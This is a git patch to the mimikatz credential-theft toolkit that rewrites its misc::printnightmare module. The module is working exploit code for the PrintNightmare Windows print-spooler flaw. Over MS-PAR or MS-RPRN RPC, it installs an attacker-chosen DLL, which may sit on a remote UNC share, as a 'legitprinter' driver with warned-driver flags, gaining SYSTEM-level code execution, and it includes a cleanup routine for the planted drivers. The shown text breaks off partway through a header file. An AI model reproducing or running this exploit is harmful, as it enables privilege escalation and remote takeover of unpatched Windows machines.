From fc7f5cc2a3cb605ea7f2b1dc79cf42aa94902d44 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Fri, 9 Jul 2021 23:27:22 +0200 Subject: [PATCH] [new] mimikatz misc::printnightmare rewrited :) (more love inside) [fix #359] internal busylight module (less memory leak ;)) - thank you @JohnLaTwC --- mimikatz/modules/kuhl_m_misc.c | 536 ++++++++++------------------ mimikatz/modules/kuhl_m_misc.h | 12 +- mimispool/mimispool.c | 85 ++++- mimispool/mimispool.def | 7 + mimispool/mimispool.h | 28 +- mimispool/mimispool.rc | Bin 1924 -> 1944 bytes mimispool/mimispool.vcxproj | 4 + mimispool/mimispool.vcxproj.filters | 3 + modules/kull_m_busylight.c | 10 +- modules/rpc/kull_m_rpc_ms-par.h | 1 + modules/rpc/kull_m_rpc_ms-par_c.c | 33 +- modules/rpc/kull_m_rpc_ms-rprn.c | 85 +++-- modules/rpc/kull_m_rpc_ms-rprn.h | 2 + 13 files changed, 387 insertions(+), 419 deletions(-) create mode 100644 mimispool/mimispool.def diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index af5fdd96..c5df8947 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c @@ -1403,141 +1403,99 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]) NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]) { - RPC_BINDING_HANDLE hBinding; RPC_STATUS rpcStatus; - LPCWSTR szRemote, szService, szLibrary; - LPWSTR szShortLibrary, szRand1, szName1, szName2, szSystem32, szDriver, szKernelBase; - DRIVER_INFO_2 DriverInfo = {3, NULL, -#if defined(_M_X64) || defined(_M_ARM64) - L"Windows x64" -#elif defined(_M_IX86) - L"Windows x86" -#endif - , NULL, NULL, NULL}; + BOOL bIsPar, bIsX64; DWORD AuthnSvc; + LPCWSTR szLibrary, szRemote, szProtSeq, szEndpoint, szService, szForce; + LPWSTR szRand; SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE}; + DRIVER_INFO_2 DriverInfo = {3, NULL, NULL, NULL, NULL, NULL,}; - if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL)) + kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, &secIdentity, NULL, TRUE); + if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL)) { + bIsPar = TRUE; + szProtSeq = L"ncacn_ip_tcp"; + szEndpoint = NULL; + szService = L"host"; + AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE; kprintf(L"[ms-par/ncacn_ip_tcp] remote: %s\n", szRemote); - kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"host", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE); - if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szRemote, NULL, szService, TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DELEGATE, &hBinding, NULL)) - { - rpcStatus = RpcBindingSetObject(hBinding, (UUID *) &PAR_ObjectUUID); - if(rpcStatus == RPC_S_OK) - { - if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL)) - { - if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary)) - { - if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(hBinding, DriverInfo.pEnvironment, &szSystem32, &szDriver)) - { - if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32)) - { - kprintf(L"* KernelBase: %s\n", szKernelBase); - if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver)) - { - kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary); - szRand1 = kull_m_string_getRandomGUID(); - if(szRand1) - { - if(kull_m_string_sprintf(&szName1, MIMIKATZ L"-%s-legitprinter", szRand1)) - { - if(kull_m_string_sprintf(&szName2, MIMIKATZ L"-%s-reallylegitprinter", szRand1)) - { - DriverInfo.pName = szName1; - if(kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(hBinding, &DriverInfo, NULL, szKernelBase) == ERROR_SUCCESS) - { - DriverInfo.pName = szName2; - kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(hBinding, &DriverInfo, szSystem32, szShortLibrary); - } - LocalFree(szName2); - } - LocalFree(szName1); - } - LocalFree(szRand1); - } - LocalFree(DriverInfo.pDriverPath); - } - LocalFree(szKernelBase); - } - LocalFree(szSystem32); - LocalFree(szDriver); - } - LocalFree(DriverInfo.pDataFile); - } - } - else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL)) - { - kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(hBinding, DriverInfo.pEnvironment, TRUE); - } - else - { - kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(hBinding, DriverInfo.pEnvironment, FALSE); - } - } - else PRINT_ERROR(L"RpcBindingSetObject: 0x%08x (%u)\n", rpcStatus, rpcStatus); - - kull_m_rpc_deleteBinding(&hBinding); - } } else { + bIsPar = FALSE; + szProtSeq = L"ncalrpc"; + szEndpoint = (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8) ? L"spoolss" : NULL; + szRemote = NULL; + szService = NULL; + AuthnSvc = RPC_C_AUTHN_LEVEL_DEFAULT; + rpcStatus = RPC_S_OK; kprintf(L"[ms-rprn/ncalrpc] local\n"); - if(kull_m_rpc_createBinding(NULL, L"ncalrpc", NULL, NULL, NULL, FALSE, RPC_C_AUTHN_LEVEL_DEFAULT, NULL, RPC_C_IMP_LEVEL_DELEGATE, &hSpoolHandle, NULL)) + } + + if(kull_m_string_args_byName(argc, argv, L"x64", NULL, NULL) || kull_m_string_args_byName(argc, argv, L"win64", NULL, NULL)) + { + bIsX64 = TRUE; + } + else if(kull_m_string_args_byName(argc, argv, L"x86", NULL, NULL) || kull_m_string_args_byName(argc, argv, L"win32", NULL, NULL)) + { + bIsX64 = FALSE; + } + else + { +#if defined(_M_X64) || defined(_M_ARM64) // :') + bIsX64 = TRUE; +#elif defined(_M_IX86) + bIsX64 = FALSE; +#endif + } + + if(kull_m_rpc_createBinding(NULL, szProtSeq, szRemote, szEndpoint, szService, bIsPar, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DELEGATE, &hSpoolHandle, NULL)) + { + if(bIsPar) { + rpcStatus = RpcBindingSetObject(hSpoolHandle, (UUID *) &PAR_ObjectUUID); + if(rpcStatus != RPC_S_OK) + { + PRINT_ERROR(L"RpcBindingSetObject: 0x%08x (%u)\n", rpcStatus, rpcStatus); + } + } + + if(rpcStatus == RPC_S_OK) + { + DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86"; if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL)) { - if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary)) + if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL)) { - if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(DriverInfo.pEnvironment, &szSystem32, &szDriver)) + szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL; + + szRand = kull_m_string_getRandomGUID(); + if(szRand) { - if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32)) + if(kull_m_string_sprintf(&DriverInfo.pName, MIMIKATZ L"-%s-legitprinter", szRand)) { - kprintf(L"* KernelBase: %s\n", szKernelBase); - if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver)) + if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle)) { - kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary); - szRand1 = kull_m_string_getRandomGUID(); - if(szRand1) - { - if(kull_m_string_sprintf(&szName1, MIMIKATZ L"-%s-legitprinter", szRand1)) - { - if(kull_m_string_sprintf(&szName2, MIMIKATZ L"-%s-reallylegitprinter", szRand1)) - { - DriverInfo.pName = szName1; - if(kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(&DriverInfo, NULL, szKernelBase) == ERROR_SUCCESS) - { - DriverInfo.pName = szName2; - kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(&DriverInfo, szSystem32, szShortLibrary); - } - LocalFree(szName2); - } - LocalFree(szName1); - } - LocalFree(szRand1); - } + kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER); + + LocalFree(DriverInfo.pDataFile); LocalFree(DriverInfo.pDriverPath); } - LocalFree(szKernelBase); + LocalFree(DriverInfo.pName); } - LocalFree(szSystem32); - LocalFree(szDriver); + LocalFree(szRand); } - LocalFree(DriverInfo.pDataFile); + LocalFree(DriverInfo.pConfigFile); } } - else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL)) - { - kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(DriverInfo.pEnvironment, TRUE); - } else { - kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(DriverInfo.pEnvironment, FALSE); + kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL)); } - - kull_m_rpc_deleteBinding(&hSpoolHandle); } + + kull_m_rpc_deleteBinding(&hSpoolHandle); } return STATUS_SUCCESS; @@ -1546,10 +1504,17 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]) BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary) { BOOL status = FALSE; - - if(szLibrary == wcsstr(szLibrary, L"\\\\")) + LPCWSTR szPtr; + + szPtr = wcsstr(szLibrary, L"\\\\"); + if(szPtr != szLibrary) + { + szPtr = wcsstr(szLibrary, L"//"); + } + + if(szPtr == szLibrary) { - status = kull_m_string_sprintf(pszNormalizedLibrary, L"\\??\\UNC%s", szLibrary + 1); + status = kull_m_string_sprintf(pszNormalizedLibrary, L"\\??\\UNC\\%s", szLibrary + 2); } else { @@ -1558,17 +1523,20 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz if(status) { - status = FALSE; - *pszShortLibrary = wcsrchr(*pszNormalizedLibrary, L'\\'); - if(*pszShortLibrary && *(*pszShortLibrary + 1)) + if(pszShortLibrary) { - (*pszShortLibrary)++; - status = TRUE; - } - else - { - PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", *pszNormalizedLibrary); - LocalFree(*pszNormalizedLibrary); + status = FALSE; + *pszShortLibrary = wcsrchr(*pszNormalizedLibrary, L'\\'); + if(*pszShortLibrary && *(*pszShortLibrary + 1)) + { + (*pszShortLibrary)++; + status = TRUE; + } + else + { + PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", *pszNormalizedLibrary); + LocalFree(*pszNormalizedLibrary); + } } } else PRINT_ERROR_AUTO(L"kull_m_string_sprintf/kull_m_string_copy"); @@ -1576,205 +1544,116 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz return status; } -void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete) +BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding) { - DWORD ret, i, cReturned = 0; - _PDRIVER_INFO_2 pDriverInfo; - PWSTR pName, pConfig; + BOOL status = FALSE; + LPWSTR szPrinterDriverDirectory = NULL; + wchar_t szDynamicPrinterDriverDirectory[MAX_PATH + 1]; + DWORD ret, cbNeeded; - if(kuhl_m_misc_printnightmare_CallEnumPrinters_par(hRemoteBinding, szEnvironment, &pDriverInfo, &cReturned)) + if(szForce) { - for(i = 0; i < cReturned; i++) + kprintf(L"| force driver/data: %s\n", szForce); + if(kull_m_string_copy(&pInfo2->pDriverPath, szForce)) { - pName = (PWSTR) (pDriverInfo[i].NameOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].NameOffset : NULL); - pConfig = (PWSTR) (pDriverInfo[i].ConfigFileOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].ConfigFileOffset : NULL); - - if(pName && pConfig) + if(kull_m_string_copy(&pInfo2->pDataFile, szForce)) { - kprintf(L"| %s (%s)\n", pName, pConfig); - if(bIsDelete) - { - if(pName == wcsstr(pName, MIMIKATZ L"-")) - { - kprintf(L"> "); - RpcTryExcept - { - ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0); - if(ret == ERROR_SUCCESS) - { - kprintf(L"deleted!\n"); - } - else PRINT_ERROR(L"RpcAsyncDeletePrinterDriverEx: %u\n", ret); - } - RpcExcept(RPC_EXCEPTION) - PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); - RpcEndExcept - } - } + status = TRUE; } + else LocalFree(&pInfo2->pDriverPath); } - LocalFree(pDriverInfo); } -} - -BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver) -{ - BOOL status = FALSE; - DWORD i, cReturned = 0; - _PDRIVER_INFO_2 pDriverInfo; - LPWSTR pDriverPath, ptrSys, ptrDrv; - - if(szSystem32 && szDriver) + else { - if(kuhl_m_misc_printnightmare_CallEnumPrinters_par(hRemoteBinding, szEnvironment, &pDriverInfo, &cReturned)) + if(!bIsDynamic) { - for(i = 0; (i < cReturned) && !status; i++) + kull_m_string_sprintf(&szPrinterDriverDirectory, L"c:\\windows\\system32\\spool\\drivers\\%s", bIsX64 ? L"x64" : L"W32X86"); + kprintf(L"| static: %s\n", szPrinterDriverDirectory); + } + else + { + RpcTryExcept { - pDriverPath = (PWSTR) (pDriverInfo[i].DriverPathOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].DriverPathOffset : NULL); - if(pDriverPath) + if(bIsPar) { - ptrSys = StrStrI(pDriverPath, L"system32\\driverstore\\filerepository\\ntprint.inf_"); - if(ptrSys) - { - ptrDrv = wcsrchr(pDriverPath, L'\\'); - if(ptrDrv && *(ptrDrv + 1)) - { - *(ptrDrv + 1) = L'\0'; - if(kull_m_string_copy(szDriver, pDriverPath)) - { - *(ptrSys + 9) = L'\0'; - status = kull_m_string_copy(szSystem32, pDriverPath); - if(!status) - { - LocalFree(*szDriver); - } - } - } - } + kprintf(L"> RpcAsyncGetPrinterDriverDirectory: "); + ret = RpcAsyncGetPrinterDriverDirectory(hRemoteBinding, NULL, pInfo2->pEnvironment, 1, (unsigned char *) szDynamicPrinterDriverDirectory, sizeof(szDynamicPrinterDriverDirectory), &cbNeeded); + } + else + { + kprintf(L"> RpcGetPrinterDriverDirectory: "); + ret = RpcGetPrinterDriverDirectory(NULL, pInfo2->pEnvironment, 1, (unsigned char *) szDynamicPrinterDriverDirectory, sizeof(szDynamicPrinterDriverDirectory), &cbNeeded); } - } - LocalFree(pDriverInfo); - } - } - return status; -} - -DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile) -{ - DWORD ret, dwFlags = APD_COPY_FROM_DIRECTORY | 0x8000; // APD_INSTALL_WARNED_DRIVER; - DRIVER_CONTAINER container_info; - LPWSTR szConfig = NULL; - - container_info.Level = 2; - container_info.DriverInfo.Level2 = pInfo2; - if(szSystem32) - { - if(kull_m_string_sprintf(&szConfig, L"%sspool\\drivers\\%s\\3\\%s", szSystem32, -#if defined(_M_ARM64) - L"ARM64" -#elif defined(_M_X64) - L"x64" -#elif defined(_M_IX86) - L"W32X86" -#endif - , pConfigFile)) - { - pInfo2->pConfigFile = szConfig; - } - else pInfo2->pConfigFile = NULL; - dwFlags |= APD_COPY_NEW_FILES; - } - else - { - pInfo2->pConfigFile = (LPWSTR)pConfigFile; - dwFlags |= APD_COPY_ALL_FILES; - } - kprintf(L"> ConfigFile: 0x%08x - %s - ", dwFlags, pInfo2->pConfigFile); - RpcTryExcept - { - ret = RpcAsyncAddPrinterDriver(hRemoteBinding, NULL, &container_info, dwFlags); - if (ret == ERROR_SUCCESS) - { - kprintf(L"OK!\n"); + if(ret == ERROR_SUCCESS) + { + kprintf(L"%s\n", szDynamicPrinterDriverDirectory); + kull_m_string_copy(&szPrinterDriverDirectory, szDynamicPrinterDriverDirectory); + } + else PRINT_ERROR(L"Rpc%sGetPrinterDriverDirectory: %u\n", bIsPar ? L"Async" : L"", ret); + } + RpcExcept(RPC_EXCEPTION) + PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); + RpcEndExcept } - else PRINT_ERROR(L"%u\n", ret); - } - RpcExcept(RPC_EXCEPTION) - PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); - RpcEndExcept - - if(szConfig) - { - LocalFree(szConfig); - } - return ret; -} - -BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned) -{ - BOOL status = FALSE; - DWORD ret, cbNeeded = 0; - - RpcTryExcept - { - ret = RpcAsyncEnumPrinterDrivers(hRemoteBinding, NULL, (wchar_t *) szEnvironment, 2, NULL, 0, &cbNeeded, pcReturned); - if(ret == ERROR_INSUFFICIENT_BUFFER) + if(szPrinterDriverDirectory) { - *ppDriverInfo = (_PDRIVER_INFO_2) LocalAlloc(LPTR, cbNeeded); - if(*ppDriverInfo) + if(kull_m_string_sprintf(&pInfo2->pDriverPath, L"%s\\3\\%s", szPrinterDriverDirectory, L"mxdwdrv.dll")) { - ret = RpcAsyncEnumPrinterDrivers(hRemoteBinding, NULL, (wchar_t *) szEnvironment, 2, (BYTE *) *ppDriverInfo, cbNeeded, &cbNeeded, pcReturned); - if(ret == ERROR_SUCCESS) + if(kull_m_string_sprintf(&pInfo2->pDataFile, L"%s\\3\\%s", szPrinterDriverDirectory, L"mxdwdrv.dll")) { status = TRUE; } else { - PRINT_ERROR(L"RpcAsyncEnumPrinterDrivers(data): %u\n", ret); - LocalFree(*ppDriverInfo); + LocalFree(pInfo2->pDriverPath); } } + + LocalFree(szPrinterDriverDirectory); } - else PRINT_ERROR(L"RpcAsyncEnumPrinterDrivers(init): %u\n", ret); } - RpcExcept(RPC_EXCEPTION) - PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); - RpcEndExcept - return status; } -void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(LPCWSTR szEnvironment, BOOL bIsDelete) +void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete) { - DWORD ret, i, cReturned = 0; + DWORD i, ret, cReturned = 0; _PDRIVER_INFO_2 pDriverInfo; PWSTR pName, pConfig; - if(kuhl_m_misc_printnightmare_CallEnumPrinters_rprn(szEnvironment, &pDriverInfo, &cReturned)) + if(kuhl_m_misc_printnightmare_EnumPrinters(bIsPar, hRemoteBinding, szEnvironment, &pDriverInfo, &cReturned)) { for(i = 0; i < cReturned; i++) { pName = (PWSTR) (pDriverInfo[i].NameOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].NameOffset : NULL); pConfig = (PWSTR) (pDriverInfo[i].ConfigFileOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].ConfigFileOffset : NULL); - if(pName && pConfig) { - kprintf(L"| %s (%s)\n", pName, pConfig); + kprintf(L"| %s - %s\n", pName, pConfig); if(bIsDelete) { if(pName == wcsstr(pName, MIMIKATZ L"-")) { - kprintf(L"> "); RpcTryExcept { - ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0); - if(ret == ERROR_SUCCESS) + if(bIsPar) + { + kprintf(L"> RpcAsyncDeletePrinterDriverEx: "); + ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0); + } + else { - kprintf(L"deleted!\n"); + kprintf(L"> RpcDeletePrinterDriverEx: "); + ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0); } - else PRINT_ERROR(L"RpcDeletePrinterDriverEx: %u\n", ret); + + if (ret == ERROR_SUCCESS) + { + kprintf(L"OK!\n"); + } + else PRINT_ERROR(L"%u\n", ret); } RpcExcept(RPC_EXCEPTION) PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); @@ -1787,83 +1666,28 @@ void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(LPCWSTR szEn } } -BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver) -{ - BOOL status = FALSE; - DWORD i, cReturned = 0; - _PDRIVER_INFO_2 pDriverInfo; - LPWSTR pDriverPath, ptrSys, ptrDrv; - - if(szSystem32 && szDriver) - { - if(kuhl_m_misc_printnightmare_CallEnumPrinters_rprn(szEnvironment, &pDriverInfo, &cReturned)) - { - for(i = 0; (i < cReturned) && !status; i++) - { - pDriverPath = (PWSTR) (pDriverInfo[i].DriverPathOffset ? (PBYTE) &pDriverInfo[i] + pDriverInfo[i].DriverPathOffset : NULL); - if(pDriverPath) - { - ptrSys = StrStrI(pDriverPath, L"system32\\driverstore\\filerepository\\ntprint.inf_"); - if(ptrSys) - { - ptrDrv = wcsrchr(pDriverPath, L'\\'); - if(ptrDrv && *(ptrDrv + 1)) - { - *(ptrDrv + 1) = L'\0'; - if(kull_m_string_copy(szDriver, pDriverPath)) - { - *(ptrSys + 9) = L'\0'; - status = kull_m_string_copy(szSystem32, pDriverPath); - if(!status) - { - LocalFree(*szDriver); - } - } - } - } - } - } - LocalFree(pDriverInfo); - } - } - return status; -} - -DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile) +void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags) { - DWORD ret, dwFlags = APD_COPY_FROM_DIRECTORY | 0x8000; // APD_INSTALL_WARNED_DRIVER; + DWORD ret; DRIVER_CONTAINER container_info; - LPWSTR szConfig = NULL; container_info.Level = 2; container_info.DriverInfo.Level2 = pInfo2; - if(szSystem32) + + RpcTryExcept { - if(kull_m_string_sprintf(&szConfig, L"%sspool\\drivers\\%s\\3\\%s", szSystem32, -#if defined(_M_ARM64) - L"ARM64" -#elif defined(_M_X64) - L"x64" -#elif defined(_M_IX86) - L"W32X86" -#endif - , pConfigFile)) + kprintf(L"| %s / %s - 0x%08x - %s\n", pInfo2->pName, pInfo2->pEnvironment, dwFlags, pInfo2->pConfigFile); + if(bIsPar) + { + kprintf(L"> RpcAsyncAddPrinterDriver: "); + ret = RpcAsyncAddPrinterDriver(hRemoteBinding, NULL, &container_info, dwFlags); + } + else { - pInfo2->pConfigFile = szConfig; + kprintf(L"> RpcAddPrinterDriverEx: "); + ret = RpcAddPrinterDriverEx(NULL, &container_info, dwFlags); } - else pInfo2->pConfigFile = NULL; - dwFlags |= APD_COPY_NEW_FILES; - } - else - { - pInfo2->pConfigFile = (LPWSTR)pConfigFile; - dwFlags |= APD_COPY_ALL_FILES; - } - kprintf(L"> ConfigFile: 0x%08x - %s - ", dwFlags, pInfo2->pConfigFile); - RpcTryExcept - { - ret = RpcAddPrinterDriverEx(NULL, &container_info, dwFlags); if (ret == ERROR_SUCCESS) { kprintf(L"OK!\n"); @@ -1873,42 +1697,50 @@ DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(PDRIVER_INFO_2 pInf RpcExcept(RPC_EXCEPTION) PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); RpcEndExcept - - if(szConfig) - { - LocalFree(szConfig); - } - - return ret; } - -BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_rprn(LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned) +BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned) { BOOL status = FALSE; DWORD ret, cbNeeded = 0; RpcTryExcept { - ret = RpcEnumPrinterDrivers(NULL, (wchar_t *) szEnvironment, 2, NULL, 0, &cbNeeded, pcReturned); + if(bIsPar) + { + ret = RpcAsyncEnumPrinterDrivers(hRemoteBinding, NULL, (wchar_t *) szEnvironment, 2, NULL, 0, &cbNeeded, pcReturned); + } + else + { + ret = RpcEnumPrinterDrivers(NULL, (wchar_t *) szEnvironment, 2, NULL, 0, &cbNeeded, pcReturned); + } + if(ret == ERROR_INSUFFICIENT_BUFFER) { *ppDriverInfo = (_PDRIVER_INFO_2) LocalAlloc(LPTR, cbNeeded); if(*ppDriverInfo) { - ret = RpcEnumPrinterDrivers(NULL, (wchar_t *) szEnvironment, 2, (BYTE *) *ppDriverInfo, cbNeeded, &cbNeeded, pcReturned); + if(bIsPar) + { + ret = RpcAsyncEnumPrinterDrivers(hRemoteBinding, NULL, (wchar_t *) szEnvironment, 2, (BYTE *) *ppDriverInfo, cbNeeded, &cbNeeded, pcReturned); + } + else + { + ret = RpcEnumPrinterDrivers(NULL, (wchar_t *) szEnvironment, 2, (BYTE *) *ppDriverInfo, cbNeeded, &cbNeeded, pcReturned); + } + if(ret == ERROR_SUCCESS) { status = TRUE; } else { - PRINT_ERROR(L"RpcEnumPrinterDrivers(data): %u\n", ret); + PRINT_ERROR(L"Rpc%sEnumPrinterDrivers(data): %u\n", bIsPar ? L"Async" : L"", ret); LocalFree(*ppDriverInfo); } } } - else PRINT_ERROR(L"RpcEnumPrinterDrivers(init): %u\n", ret); + else PRINT_ERROR(L"Rpc%sEnumPrinterDrivers(init): %u\n", bIsPar ? L"Async" : L"", ret); } RpcExcept(RPC_EXCEPTION) PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode()); diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h index 7b8d5b0a..84be28aa 100644 --- a/mimikatz/modules/kuhl_m_misc.h +++ b/mimikatz/modules/kuhl_m_misc.h @@ -49,14 +49,10 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]); BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary); -void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete); -BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver); -DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile); -BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned); -void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(LPCWSTR szEnvironment, BOOL bIsDelete); -BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver); -DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile); -BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_rprn(LPCWSTR szEnvironment, 